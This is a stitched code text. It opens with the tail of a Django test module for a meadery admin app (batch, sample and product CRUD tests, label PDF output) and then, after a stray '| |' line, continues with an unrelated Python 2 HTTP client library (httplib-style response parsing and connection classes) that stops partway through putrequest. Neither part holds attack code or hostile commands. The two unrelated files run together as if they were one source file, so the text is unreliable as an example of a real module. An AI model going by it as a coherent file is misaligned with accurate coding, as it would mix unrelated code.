self.assertEqual(after, Batch.objects.filter(title=self.batch["title"]).exists())
return _decorator
return real_decorator
def batch_add(ings, respstr):
def real_decorator(func):
def _decorator(self, *args, **kwds):
batch = BatchTestCase.build_batch(BatchTestCase.fields, [BatchTestCase.ingredients[x] for x in ings], [])
response = self.client.post(self.url, batch, follow=True)
self.assertRegex(response.content, bytes(respstr, "utf8"))
func(self, *args, **kwds)
return _decorator
return real_decorator
@batch_exists(False, False)
@admin_login
@batch_add([], "At least one sugar source is required.")
def test_bad_post_no_data(self):
pass
@batch_exists(False, False)
@admin_login
@batch_add([0, 1, 2], "At least one yeast is required.")
def test_bad_post_no_yeast(self):
pass
@batch_exists(False, False)
@admin_login
@batch_add([1, 2, 3], "At least one sugar source is required.")
def test_bad_post_no_sugar(self):
pass
@batch_exists(False, False)
@admin_login
@batch_add([0, 1, 3], "At least two solvents with different temperatures are required.")
def test_bad_post_not_enough_solvent(self):
pass
@batch_exists(False, False)
@admin_login
@batch_add([0, 1, 1, 3], "At least two solvents with different temperatures are required.")
def test_bad_post_solvents_same_temp(self):
pass
@batch_exists(False, True)
@admin_login
@batch_add([0, 1, 2, 3], "The batch .*{0} {1}.* was added successfully.".format(BatchTestCase.fields["brewname"], BatchTestCase.fields["batchletter"]))
def test_good_post(self):
pass
class BatchModifyTestCase(BatchTestCase):
def setUp(self):
super(BatchModifyTestCase, self).setUp()
self.batch = Batch.objects.all()[0]
self.pk = self.batch.pk
self.url = reverse("admin:meadery_batch_change", args=(self.pk,))
@admin_login
def test_modify(self):
old_description = self.batch.description
new_description = old_description + "!!!"
self.assertNotEqual(old_description, new_description)
# JMT: this is ... excessive
batch = BatchTestCase.build_batch(BatchTestCase.fields, BatchTestCase.ingredients, [])
batch["description"] = new_description
response = self.client.post(self.url, batch, follow=True)
respstr = "The batch .*{0} {1}.* was changed successfully.".format(BatchTestCase.fields["brewname"], BatchTestCase.fields["batchletter"])
self.assertRegex(response.content, bytes(respstr, "utf8"))
batch = Batch.objects.get(pk=self.pk)
self.assertNotEqual(old_description, batch.description)
self.assertEqual(new_description, batch.description)
@skipIf(True, "Django reports redirect loop incorrectly.")
@admin_login
def test_create_recipe_from_batch(self):
# JMT: someday test for existing recipes?
old_recipe_count = Recipe.objects.count()
button_url = "{0}create_recipe/".format(self.url)
response = self.client.get(button_url, follow=True)
self.assertEqual(response.status_code, 302)
redirect_target = button_url
redirect_chain = [(redirect_target, 302), (redirect_target, 302)]
self.assertEqual(response.redirect_chain, redirect_chain)
new_recipe_count = Recipe.objects.count()
self.assertEqual(new_recipe_count, old_recipe_count + 1)
class BatchCreateProductFromBatchTestCase(BatchModifyTestCase):
def setUp(self):
super(BatchCreateProductFromBatchTestCase, self).setUp()
batches = Batch.objects.annotate(num_samples=Count("sample"))
for prod in Product.objects.all():
batches = batches.exclude(brewname=prod.brewname, batchletter=prod.batchletter)
self.batch_with = batches.filter(num_samples__gt=0).order_by("is_active", "-created_at")[0]
self.batch_without = batches.filter(num_samples=0).order_by("is_active", "-created_at")[0]
def batch_create_product(samples, jars, success):
def real_decorator(func):
def _decorator(self, *args, **kwds):
func(self, *args, **kwds)
batch = self.batch_with if samples else self.batch_without
batch.jars = jars
batch.save()
old_product_count = Product.objects.count()
# JMT: must be a better way
url = reverse("admin:meadery_batch_change", args=(batch.pk,))
button_url = "{0}create_product/".format(url)
response = self.client.get(button_url, follow=True)
self.assertEqual(response.status_code, 302)
redirect_target = button_url
redirect_chain = [(redirect_target, 302), (redirect_target, 302)]
self.assertEqual(response.redirect_chain, redirect_chain)
new_product_count = Product.objects.count()
if success:
self.assertNotEqual(new_product_count, old_product_count)
else:
self.assertEqual(new_product_count, old_product_count)
return _decorator
return real_decorator
def test_modify(self):
pass
def test_create_recipe_from_batch(self):
pass
@skipIf(True, "Django reports redirect loop incorrectly.")
@admin_login
@batch_create_product(True, 0, False)
def test_samples_no_jars(self):
pass
@skipIf(True, "Django reports redirect loop incorrectly.")
@admin_login
@batch_create_product(False, 0, False)
def test_no_samples_no_jars(self):
pass
@skipIf(True, "Django reports redirect loop incorrectly.")
@admin_login
@batch_create_product(False, 24, False)
def test_jars_no_samples(self):
pass
@skipIf(True, "Django reports redirect loop incorrectly.")
@admin_login
@batch_create_product(True, 24, True)
def test_good_product_does_not_exist(self):
pass
@skipIf(True, "Django reports redirect loop incorrectly.")
@admin_login
@batch_create_product(True, 24, False)
def test_good_product_exists(self):
url = reverse("admin:meadery_batch_change", args=(self.batch_with.pk,))
button_url = "{0}create_product/".format(url)
response = self.client.get(button_url, follow=True)
self.assertEqual(response.status_code, 302)
redirect_target = button_url
redirect_chain = [(redirect_target, 302), (redirect_target, 302)]
self.assertEqual(response.redirect_chain, redirect_chain)
class BatchDeleteTestCase(BatchTestCase):
def setUp(self):
super(BatchDeleteTestCase, self).setUp()
self.batch = Batch.objects.all()[0]
self.pk = self.batch.pk
self.url = reverse("admin:meadery_batch_delete", args=(self.pk,))
@admin_login
def test_delete(self):
response = self.client.post(self.url, follow=True)
self.assertContains(response, "Are you sure?")
# body = self.selenium.find_element_by_tag_name('body')
# self.assertIn('Are you sure?', body.text)
# self.assertIn('All of the following related items will be deleted', body.text)
# self.selenium.find_element_by_xpath('//input[@type="submit"]').click()
# self.assertIn('The batch "%s" was deleted successfully.' % name, self.selenium.find_element_by_tag_name('body').text)
# self.assertFalse(Batch.objects.filter(pk=pk).exists())
class BatchMiscTestCase(BatchTestCase):
def setUp(self):
super(BatchMiscTestCase, self).setUp()
self.url = reverse("admin:meadery_batch_changelist")
@admin_login
def test_make_labels(self):
# Monkey patch generate_labels to use the generic one.
from meadery import meadery
from meadery.labels import Label
def generate_labels(batch):
return [Label(seq, batch) for seq in range(batch.jars)]
meadery.generate_labels = generate_labels
fields = {"action": "make_labels", "select_across": "0", "index": "0"}
# What batches have jars? (hint: SIP 98 A and SIP 98 C)
batches = Batch.objects.filter(jars__gt=0).order_by("pk")
batchnames = ", ".join("{0} {1}".format(batch.brewname, batch.batchletter) for batch in batches)
# filename = batchnames.lower().replace(', ', '-').replace(' ', '')
fields["_selected_action"] = tuple([str(batch.pk) for batch in batches])
response = self.client.post(self.url, fields, follow=True)
# Two things should occur:
# - a PDF file containing labels should be downloaded
# (check filename? match file against known good file?)
# - a message referencing success should appear in the body
# (less important)
# On Travis, the body message is in the response.
# At home, the PDF is in the response.
# Why? Who knows.
import os
if os.getenv("TRAVIS", None):
self.assertContains(response, "Labels were made for {0}".format(batchnames))
else:
self.assertEqual(response.get("Content-Type"), "application/pdf")
class SampleTestCase(MeaderyTestCase):
fields = {"date": "2012-05-31", "temp": "60", "sg": "1.168", "notes": "Tastes great for a test!"}
def setUp(self):
super(SampleTestCase, self).setUp()
self.url = reverse("admin:meadery_sample_changelist")
@staticmethod
def build_sample(fields):
sample = SampleTestCase.fields
sample["batch"] = Batch.objects.all()[0].pk
return sample
class SampleAddTestCase(SampleTestCase):
def setUp(self):
super(SampleAddTestCase, self).setUp()
self.url = reverse("admin:meadery_sample_add")
def sample_exists(before, after):
def real_decorator(func):
def _decorator(self, *args, **kwds):
self.assertEqual(before, Sample.objects.filter(notes=self.fields["notes"]).exists())
func(self, *args, **kwds)
self.assertEqual(after, Sample.objects.filter(notes=self.fields["notes"]).exists())
return _decorator
return real_decorator
# JMT: consider adding bad tests
@sample_exists(False, True)
@admin_login
def test_good_post(self):
sample = SampleTestCase.build_sample(SampleTestCase.fields)
response = self.client.post(self.url, sample, follow=True)
respstr = "The sample .*{0}.* was added successfully.".format(Sample.objects.get(notes=self.fields["notes"]))
self.assertRegex(response.content, bytes(respstr, "utf8"))
class SampleModifyTestCase(SampleTestCase):
def setUp(self):
super(SampleModifyTestCase, self).setUp()
self.sample = Sample.objects.all()[0]
self.pk = self.sample.pk
self.url = reverse("admin:meadery_sample_change", args=(self.pk,))
@admin_login
def test_modify(self):
old_notes = self.sample.notes
new_notes = old_notes + "!!!"
self.assertNotEqual(old_notes, new_notes)
# JMT: this is ... excessive
sample = SampleTestCase.build_sample(SampleTestCase.fields)
sample["notes"] = new_notes
response = self.client.post(self.url, sample, follow=True)
respstr = "The sample .*{0}.* was changed successfully.".format(self.sample)
self.assertRegex(response.content, bytes(respstr, "utf8"))
sample = Sample.objects.get(pk=self.pk)
self.assertNotEqual(old_notes, sample.notes)
self.assertEqual(new_notes, sample.notes)
class SampleDeleteTestCase(SampleTestCase):
def setUp(self):
super(SampleDeleteTestCase, self).setUp()
self.sample = Sample.objects.all()[0]
self.pk = self.sample.pk
self.url = reverse("admin:meadery_sample_delete", args=(self.pk,))
@admin_login
def test_delete(self):
response = self.client.post(self.url, follow=True)
self.assertContains(response, "Are you sure?")
# body = self.selenium.find_element_by_tag_name('body')
# self.assertIn('Are you sure?', body.text)
# self.assertIn('All of the following related items will be deleted', body.text)
# self.selenium.find_element_by_xpath('//input[@type="submit"]').click()
# self.assertIn('The sample "%s" was deleted successfully.' % name, self.selenium.find_element_by_tag_name('body').text)
# self.assertFalse(Sample.objects.filter(pk=pk).exists())
class ProductTestCase(MeaderyTestCase):
fields = {
"title": "Test Product",
"description": "Test description!",
"category": "241",
"brewname": "SIP 99",
"batchletter": "A",
# 'is_active': 'on'
"meta_keywords": "bogus",
"meta_description": "bogus",
"brewed_date": "2013-05-01",
"brewed_sg": "1.126",
"bottled_date": "2013-05-31",
"bottled_sg": "0.996",
"abv": "17.33",
}
def setUp(self):
super(ProductTestCase, self).setUp()
self.url = reverse("admin:meadery_product_changelist")
@staticmethod
def build_product(fields):
product = {}
for key, value in list(ProductTestCase.fields.items()):
product[key] = value
return product
class ProductAddTestCase(ProductTestCase):
def setUp(self):
super(ProductAddTestCase, self).setUp()
self.url = reverse("admin:meadery_product_add")
self.product = ProductTestCase.build_product(ProductTestCase.fields)
def product_exists(before, after):
def real_decorator(func):
def _decorator(self, *args, **kwds):
self.assertEqual(before, Product.objects.filter(title=self.product["title"]).exists())
func(self, *args, **kwds)
self.assertEqual(after, Product.objects.filter(title=self.product["title"]).exists())
return _decorator
return real_decorator
# JMT: write tests that check for bad posts
@product_exists(False, True)
@admin_login
def test_good_post(self):
product = ProductTestCase.build_product(ProductTestCase.fields)
response = self.client.post(self.url, product, follow=True)
respstr = "The product .*{0} {1}.* was added successfully.".format(ProductTestCase.fields["brewname"], ProductTestCase.fields["batchletter"])
self.assertRegex(response.content, bytes(respstr, "utf8"))
class ProductModifyTestCase(ProductTestCase):
def setUp(self):
super(ProductModifyTestCase, self).setUp()
self.product = Product.objects.all()[0]
self.pk = self.product.pk
self.url = reverse("admin:meadery_product_change", args=(self.pk,))
@admin_login
def test_modify(self):
old_description = self.product.description
new_description = old_description + "!!!"
self.assertNotEqual(old_description, new_description)
# JMT: this is ... excessive
product = ProductTestCase.build_product(ProductTestCase.fields)
product["description"] = new_description
response = self.client.post(self.url, product, follow=True)
respstr = "The product .*{0} {1}.* was changed successfully.".format(ProductTestCase.fields["brewname"], ProductTestCase.fields["batchletter"])
self.assertRegex(response.content, bytes(respstr, "utf8"))
product = Product.objects.get(pk=self.pk)
self.assertNotEqual(old_description, product.description)
self.assertEqual(new_description, product.description)
class ProductDeleteTestCase(ProductTestCase):
def setUp(self):
super(ProductDeleteTestCase, self).setUp()
self.product = Product.objects.all()[0]
self.pk = self.product.pk
self.url = reverse("admin:meadery_product_delete", args=(self.pk,))
@admin_login
def test_delete(self):
response = self.client.post(self.url, follow=True)
self.assertContains(response, "Are you sure?")
# body = self.selenium.find_element_by_tag_name('body')
# self.assertIn('Are you sure?', body.text)
# self.assertIn('All of the following related items will be deleted', body.text)
# self.selenium.find_element_by_xpath('//input[@type="submit"]').click()
# self.assertIn('The product "%s" was deleted successfully.' % name, self.selenium.find_element_by_tag_name('body').text)
# self.assertFalse(Product.objects.filter(pk=pk).exists())
# JMT: should also check jar count to ensure jars are deleted too!
| |
"""HTTP/1.1 client library
<intro stuff goes here>
<other stuff, too>
HTTPConnection goes through a number of "states", which define when a client
may legally make another request or fetch the response for a particular
request. This diagram details these state transitions:
(null)
|
| HTTPConnection()
v
Idle
|
| putrequest()
v
Request-started
|
| ( putheader() )* endheaders()
v
Request-sent
|
| response = getresponse()
v
Unread-response [Response-headers-read]
|\____________________
| |
| response.read() | putrequest()
v v
Idle Req-started-unread-response
______/|
/ |
response.read() | | ( putheader() )* endheaders()
v v
Request-started Req-sent-unread-response
|
| response.read()
v
Request-sent
This diagram presents the following rules:
-- a second request may not be started until {response-headers-read}
-- a response [object] cannot be retrieved until {request-sent}
-- there is no differentiation between an unread response body and a
partially read response body
Note: this enforcement is applied by the HTTPConnection class. The
HTTPResponse class does not enforce this state machine, which
implies sophisticated clients may accelerate the request/response
pipeline. Caution should be taken, though: accelerating the states
beyond the above pattern may imply knowledge of the server's
connection-close behavior for certain requests. For example, it
is impossible to tell whether the server will close the connection
UNTIL the response headers have been read; this means that further
requests cannot be placed into the pipeline until it is known that
the server will NOT be closing the connection.
Logical State __state __response
------------- ------- ----------
Idle _CS_IDLE None
Request-started _CS_REQ_STARTED None
Request-sent _CS_REQ_SENT None
Unread-response _CS_IDLE <response_class>
Req-started-unread-response _CS_REQ_STARTED <response_class>
Req-sent-unread-response _CS_REQ_SENT <response_class>
"""
from array import array
import socket
from sys import py3kwarning
from urlparse import urlsplit
import warnings
with warnings.catch_warnings():
if py3kwarning:
warnings.filterwarnings("ignore", ".*mimetools has been removed",
DeprecationWarning)
import mimetools
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
__all__ = ["HTTP", "HTTPResponse", "HTTPConnection",
"HTTPException", "NotConnected", "UnknownProtocol",
"UnknownTransferEncoding", "UnimplementedFileMode",
"IncompleteRead", "InvalidURL", "ImproperConnectionState",
"CannotSendRequest", "CannotSendHeader", "ResponseNotReady",
"BadStatusLine", "error", "responses"]
HTTP_PORT = 80
HTTPS_PORT = 443
_UNKNOWN = 'UNKNOWN'
# connection states
_CS_IDLE = 'Idle'
_CS_REQ_STARTED = 'Request-started'
_CS_REQ_SENT = 'Request-sent'
# status codes
# informational
CONTINUE = 100
SWITCHING_PROTOCOLS = 101
PROCESSING = 102
# successful
OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207
IM_USED = 226
# redirection
MULTIPLE_CHOICES = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307
# client error
BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
METHOD_NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTHENTICATION_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417
UNPROCESSABLE_ENTITY = 422
LOCKED = 423
FAILED_DEPENDENCY = 424
UPGRADE_REQUIRED = 426
# server error
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE = 507
NOT_EXTENDED = 510
# Mapping status codes to official W3C names
responses = {
100: 'Continue',
101: 'Switching Protocols',
200: 'OK',
201: 'Created',
202: 'Accepted',
203: 'Non-Authoritative Information',
204: 'No Content',
205: 'Reset Content',
206: 'Partial Content',
300: 'Multiple Choices',
301: 'Moved Permanently',
302: 'Found',
303: 'See Other',
304: 'Not Modified',
305: 'Use Proxy',
306: '(Unused)',
307: 'Temporary Redirect',
400: 'Bad Request',
401: 'Unauthorized',
402: 'Payment Required',
403: 'Forbidden',
404: 'Not Found',
405: 'Method Not Allowed',
406: 'Not Acceptable',
407: 'Proxy Authentication Required',
408: 'Request Timeout',
409: 'Conflict',
410: 'Gone',
411: 'Length Required',
412: 'Precondition Failed',
413: 'Request Entity Too Large',
414: 'Request-URI Too Long',
415: 'Unsupported Media Type',
416: 'Requested Range Not Satisfiable',
417: 'Expectation Failed',
500: 'Internal Server Error',
501: 'Not Implemented',
502: 'Bad Gateway',
503: 'Service Unavailable',
504: 'Gateway Timeout',
505: 'HTTP Version Not Supported',
}
# maximal amount of data to read at one time in _safe_read
MAXAMOUNT = 1048576
class HTTPMessage(mimetools.Message):
def addheader(self, key, value):
"""Add header for field key handling repeats."""
prev = self.dict.get(key)
if prev is None:
self.dict[key] = value
else:
combined = ", ".join((prev, value))
self.dict[key] = combined
def addcontinue(self, key, more):
"""Add more field data from a continuation line."""
prev = self.dict[key]
self.dict[key] = prev + "\n " + more
def readheaders(self):
"""Read header lines.
Read header lines up to the entirely blank line that terminates them.
The (normally blank) line that ends the headers is skipped, but not
included in the returned list. If a non-header line ends the headers,
(which is an error), an attempt is made to backspace over it; it is
never included in the returned list.
The variable self.status is set to the empty string if all went well,
otherwise it is an error message. The variable self.headers is a
completely uninterpreted list of lines contained in the header (so
printing them will reproduce the header exactly as it appears in the
file).
If multiple header fields with the same name occur, they are combined
according to the rules in RFC 2616 sec 4.2:
Appending each subsequent field-value to the first, each separated
by a comma. The order in which header fields with the same field-name
are received is significant to the interpretation of the combined
field value.
"""
# XXX The implementation overrides the readheaders() method of
# rfc822.Message. The base class design isn't amenable to
# customized behavior here so the method here is a copy of the
# base class code with a few small changes.
self.dict = {}
self.unixfrom = ''
self.headers = hlist = []
self.status = ''
headerseen = ""
firstline = 1
startofline = unread = tell = None
if hasattr(self.fp, 'unread'):
unread = self.fp.unread
elif self.seekable:
tell = self.fp.tell
while True:
if tell:
try:
startofline = tell()
except IOError:
startofline = tell = None
self.seekable = 0
line = self.fp.readline()
if not line:
self.status = 'EOF in headers'
break
# Skip unix From name time lines
if firstline and line.startswith('From '):
self.unixfrom = self.unixfrom + line
continue
firstline = 0
if headerseen and line[0] in ' \t':
# XXX Not sure if continuation lines are handled properly
# for http and/or for repeating headers
# It's a continuation line.
hlist.append(line)
self.addcontinue(headerseen, line.strip())
continue
elif self.iscomment(line):
# It's a comment. Ignore it.
continue
elif self.islast(line):
# Note! No pushback here! The delimiter line gets eaten.
break
headerseen = self.isheader(line)
if headerseen:
# It's a legal header line, save it.
hlist.append(line)
self.addheader(headerseen, line[len(headerseen)+1:].strip())
continue
else:
# It's not a header line; throw it back and stop here.
if not self.dict:
self.status = 'No headers'
else:
self.status = 'Non-header line where header expected'
# Try to undo the read.
if unread:
unread(line)
elif tell:
self.fp.seek(startofline)
else:
self.status = self.status + '; bad seek'
break
class HTTPResponse:
# strict: If true, raise BadStatusLine if the status line can't be
# parsed as a valid HTTP/1.0 or 1.1 status line. By default it is
# false because it prevents clients from talking to HTTP/0.9
# servers. Note that a response with a sufficiently corrupted
# status line will look like an HTTP/0.9 response.
# See RFC 2616 sec 19.6 and RFC 1945 sec 6 for details.
def __init__(self, sock, debuglevel=0, strict=0, method=None):
self.fp = sock.makefile('rb', 0)
self.debuglevel = debuglevel
self.strict = strict
self._method = method
self.msg = None
# from the Status-Line of the response
self.version = _UNKNOWN # HTTP-Version
self.status = _UNKNOWN # Status-Code
self.reason = _UNKNOWN # Reason-Phrase
self.chunked = _UNKNOWN # is "chunked" being used?
self.chunk_left = _UNKNOWN # bytes left to read in current chunk
self.length = _UNKNOWN # number of bytes left in response
self.will_close = _UNKNOWN # conn will close at end of response
def _read_status(self):
# Initialize with Simple-Response defaults
line = self.fp.readline()
if self.debuglevel > 0:
print "reply:", repr(line)
if not line:
# Presumably, the server closed the connection before
# sending a valid response.
raise BadStatusLine(line)
try:
[version, status, reason] = line.split(None, 2)
except ValueError:
try:
[version, status] = line.split(None, 1)
reason = ""
except ValueError:
# empty version will cause next test to fail and status
# will be treated as 0.9 response.
version = ""
if not version.startswith('HTTP/'):
if self.strict:
self.close()
raise BadStatusLine(line)
else:
# assume it's a Simple-Response from an 0.9 server
self.fp = LineAndFileWrapper(line, self.fp)
return "HTTP/0.9", 200, ""
# The status code is a three-digit number
try:
status = int(status)
if status < 100 or status > 999:
raise BadStatusLine(line)
except ValueError:
raise BadStatusLine(line)
return version, status, reason
def begin(self):
if self.msg is not None:
# we've already started reading the response
return
# read until we get a non-100 response
while True:
version, status, reason = self._read_status()
if status != CONTINUE:
break
# skip the header from the 100 response
while True:
skip = self.fp.readline().strip()
if not skip:
break
if self.debuglevel > 0:
print "header:", skip
self.status = status
self.reason = reason.strip()
if version == 'HTTP/1.0':
self.version = 10
elif version.startswith('HTTP/1.'):
self.version = 11 # use HTTP/1.1 code for HTTP/1.x where x>=1
elif version == 'HTTP/0.9':
self.version = 9
else:
raise UnknownProtocol(version)
if self.version == 9:
self.length = None
self.chunked = 0
self.will_close = 1
self.msg = HTTPMessage(StringIO())
return
self.msg = HTTPMessage(self.fp, 0)
if self.debuglevel > 0:
for hdr in self.msg.headers:
print "header:", hdr,
# don't let the msg keep an fp
self.msg.fp = None
# are we using the chunked-style of transfer encoding?
tr_enc = self.msg.getheader('transfer-encoding')
if tr_enc and tr_enc.lower() == "chunked":
self.chunked = 1
self.chunk_left = None
else:
self.chunked = 0
# will the connection close at the end of the response?
self.will_close = self._check_close()
# do we have a Content-Length?
# NOTE: RFC 2616, S4.4, #3 says we ignore this if tr_enc is "chunked"
length = self.msg.getheader('content-length')
if length and not self.chunked:
try:
self.length = int(length)
except ValueError:
self.length = None
else:
if self.length < 0: # ignore nonsensical negative lengths
self.length = None
else:
self.length = None
# does the body have a fixed length? (of zero)
if (status == NO_CONTENT or status == NOT_MODIFIED or
100 <= status < 200 or # 1xx codes
self._method == 'HEAD'):
self.length = 0
# if the connection remains open, and we aren't using chunked, and
# a content-length was not provided, then assume that the connection
# WILL close.
if not self.will_close and \
not self.chunked and \
self.length is None:
self.will_close = 1
def _check_close(self):
conn = self.msg.getheader('connection')
if self.version == 11:
# An HTTP/1.1 proxy is assumed to stay open unless
# explicitly closed.
conn = self.msg.getheader('connection')
if conn and "close" in conn.lower():
return True
return False
# Some HTTP/1.0 implementations have support for persistent
# connections, using rules different than HTTP/1.1.
# For older HTTP, Keep-Alive indicates persistent connection.
if self.msg.getheader('keep-alive'):
return False
# At least Akamai returns a "Connection: Keep-Alive" header,
# which was supposed to be sent by the client.
if conn and "keep-alive" in conn.lower():
return False
# Proxy-Connection is a netscape hack.
pconn = self.msg.getheader('proxy-connection')
if pconn and "keep-alive" in pconn.lower():
return False
# otherwise, assume it will close
return True
def close(self):
if self.fp:
self.fp.close()
self.fp = None
def isclosed(self):
# NOTE: it is possible that we will not ever call self.close(). This
# case occurs when will_close is TRUE, length is None, and we
# read up to the last byte, but NOT past it.
#
# IMPLIES: if will_close is FALSE, then self.close() will ALWAYS be
# called, meaning self.isclosed() is meaningful.
return self.fp is None
# XXX It would be nice to have readline and __iter__ for this, too.
def read(self, amt=None):
if self.fp is None:
return ''
if self._method == 'HEAD':
self.close()
return ''
if self.chunked:
return self._read_chunked(amt)
if amt is None:
# unbounded read
if self.length is None:
s = self.fp.read()
else:
s = self._safe_read(self.length)
self.length = 0
self.close() # we read everything
return s
if self.length is not None:
if amt > self.length:
# clip the read to the "end of response"
amt = self.length
# we do not use _safe_read() here because this may be a .will_close
# connection, and the user is reading more bytes than will be provided
# (for example, reading in 1k chunks)
s = self.fp.read(amt)
if self.length is not None:
self.length -= len(s)
if not self.length:
self.close()
return s
def _read_chunked(self, amt):
assert self.chunked != _UNKNOWN
chunk_left = self.chunk_left
value = []
while True:
if chunk_left is None:
line = self.fp.readline()
i = line.find(';')
if i >= 0:
line = line[:i] # strip chunk-extensions
try:
chunk_left = int(line, 16)
except ValueError:
# close the connection as protocol synchronisation is
# probably lost
self.close()
raise IncompleteRead(''.join(value))
if chunk_left == 0:
break
if amt is None:
value.append(self._safe_read(chunk_left))
elif amt < chunk_left:
value.append(self._safe_read(amt))
self.chunk_left = chunk_left - amt
return ''.join(value)
elif amt == chunk_left:
value.append(self._safe_read(amt))
self._safe_read(2) # toss the CRLF at the end of the chunk
self.chunk_left = None
return ''.join(value)
else:
value.append(self._safe_read(chunk_left))
amt -= chunk_left
# we read the whole chunk, get another
self._safe_read(2) # toss the CRLF at the end of the chunk
chunk_left = None
# read and discard trailer up to the CRLF terminator
### note: we shouldn't have any trailers!
while True:
line = self.fp.readline()
if not line:
# a vanishingly small number of sites EOF without
# sending the trailer
break
if line == '\r\n':
break
# we read everything; close the "file"
self.close()
return ''.join(value)
def _safe_read(self, amt):
"""Read the number of bytes requested, compensating for partial reads.
Normally, we have a blocking socket, but a read() can be interrupted
by a signal (resulting in a partial read).
Note that we cannot distinguish between EOF and an interrupt when zero
bytes have been read. IncompleteRead() will be raised in this
situation.
This function should be used when <amt> bytes "should" be present for
reading. If the bytes are truly not available (due to EOF), then the
IncompleteRead exception can be used to detect the problem.
"""
s = []
while amt > 0:
chunk = self.fp.read(min(amt, MAXAMOUNT))
if not chunk:
raise IncompleteRead(''.join(s), amt)
s.append(chunk)
amt -= len(chunk)
return ''.join(s)
def getheader(self, name, default=None):
if self.msg is None:
raise ResponseNotReady()
return self.msg.getheader(name, default)
def getheaders(self):
"""Return list of (header, value) tuples."""
if self.msg is None:
raise ResponseNotReady()
return self.msg.items()
class HTTPConnection:
_http_vsn = 11
_http_vsn_str = 'HTTP/1.1'
response_class = HTTPResponse
default_port = HTTP_PORT
auto_open = 1
debuglevel = 0
strict = 0
def __init__(self, host, port=None, strict=None,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.timeout = timeout
self.sock = None
self._buffer = []
self.__response = None
self.__state = _CS_IDLE
self._method = None
self._tunnel_host = None
self._tunnel_port = None
self._tunnel_headers = {}
self._set_hostport(host, port)
if strict is not None:
self.strict = strict
def _set_tunnel(self, host, port=None, headers=None):
""" Sets up the host and the port for the HTTP CONNECT Tunnelling.
The headers argument should be a mapping of extra HTTP headers
to send with the CONNECT request.
"""
self._tunnel_host = host
self._tunnel_port = port
if headers:
self._tunnel_headers = headers
else:
self._tunnel_headers.clear()
def _set_hostport(self, host, port):
if port is None:
i = host.rfind(':')
j = host.rfind(']') # ipv6 addresses have [...]
if i > j:
try:
port = int(host[i+1:])
except ValueError:
raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
host = host[:i]
else:
port = self.default_port
if host and host[0] == '[' and host[-1] == ']':
host = host[1:-1]
self.host = host
self.port = port
def set_debuglevel(self, level):
self.debuglevel = level
def _tunnel(self):
self._set_hostport(self._tunnel_host, self._tunnel_port)
self.send("CONNECT %s:%d HTTP/1.0\r\n" % (self.host, self.port))
for header, value in self._tunnel_headers.iteritems():
self.send("%s: %s\r\n" % (header, value))
self.send("\r\n")
response = self.response_class(self.sock, strict = self.strict,
method = self._method)
(version, code, message) = response._read_status()
if code != 200:
self.close()
raise socket.error("Tunnel connection failed: %d %s" % (code,
message.strip()))
while True:
line = response.fp.readline()
if line == '\r\n': break
def connect(self):
"""Connect to the host and port specified in __init__."""
self.sock = socket.create_connection((self.host,self.port),
self.timeout)
if self._tunnel_host:
self._tunnel()
def close(self):
"""Close the connection to the HTTP server."""
if self.sock:
self.sock.close() # close it manually... there may be other refs
self.sock = None
if self.__response:
self.__response.close()
self.__response = None
self.__state = _CS_IDLE
def send(self, str):
"""Send `str' to the server."""
if self.sock is None:
if self.auto_open:
self.connect()
else:
raise NotConnected()
# send the data to the server. if we get a broken pipe, then close
# the socket. we want to reconnect when somebody tries to send again.
#
# NOTE: we DO propagate the error, though, because we cannot simply
# ignore the error... the caller will know if they can retry.
if self.debuglevel > 0:
print "send:", repr(str)
try:
blocksize=8192
if hasattr(str,'read') and not isinstance(str, array):
if self.debuglevel > 0: print "sendIng a read()able"
data=str.read(blocksize)
while data:
self.sock.sendall(data)
data=str.read(blocksize)
else:
self.sock.sendall(str)
except socket.error, v:
if v.args[0] == 32: # Broken pipe
self.close()
raise
def _output(self, s):
"""Add a line of output to the current request buffer.
Assumes that the line does *not* end with \\r\\n.
"""
self._buffer.append(s)
def _send_output(self):
"""Send the currently buffered request and clear the buffer.
Appends an extra \\r\\n to the buffer.
"""
self._buffer.extend(("", ""))
msg = "\r\n".join(self._buffer)
del self._buffer[:]
self.send(msg)
def putrequest(self, method, url, skip_host=0, skip_accept_encoding=0):
"""Send a request to the server.
`method' specifies an HTTP request method, e.g. 'GET'.
`url' specifies the object being requested, e.g. '/index.html'.
`skip_host' if True does not add automatically a 'Host:' header
`skip_accept_encoding' if True does not add automatically an
'Accept-Encoding:' header
"""
# if a prior response has been completed, then forget about it.
if self.__response and self.__response.isclosed():
self.__response = None
# in certain cases, we cannot issue another request on this connection.
# this occurs when:
# 1) we are in the process of sending a request. (_CS_REQ_STARTED)
# 2) a response to a previous request has signalled that it is going
# to close the connection upon completion.
# 3) the headers for the previous response have not been read, thus
# we cannot determine whether point (2) is true. (_CS_REQ_SENT)
#
# if there is no prior response, then we can request at will.
#
# if point (2) is true, then we will have passed the socket to the
# response (effectively meaning, "there is no prior response"), and
# will open a new one when a new request is made.
#
# Note: if a prior response exists, then we *can* start a new request.
# We are not allowed to begin fetching the response to this new
# request, however, until that prior response is complete.
#
if self.__state == _CS_IDLE:
self.__state = _CS_REQ_STARTED
else:
raise CannotSendRequest()
# Save the method we use, we need it later in the response phase
self._method = method
if not url:
url = '/'
str = '%s %s %s' % (method, url, self._http_vsn_str)
self._output(str)
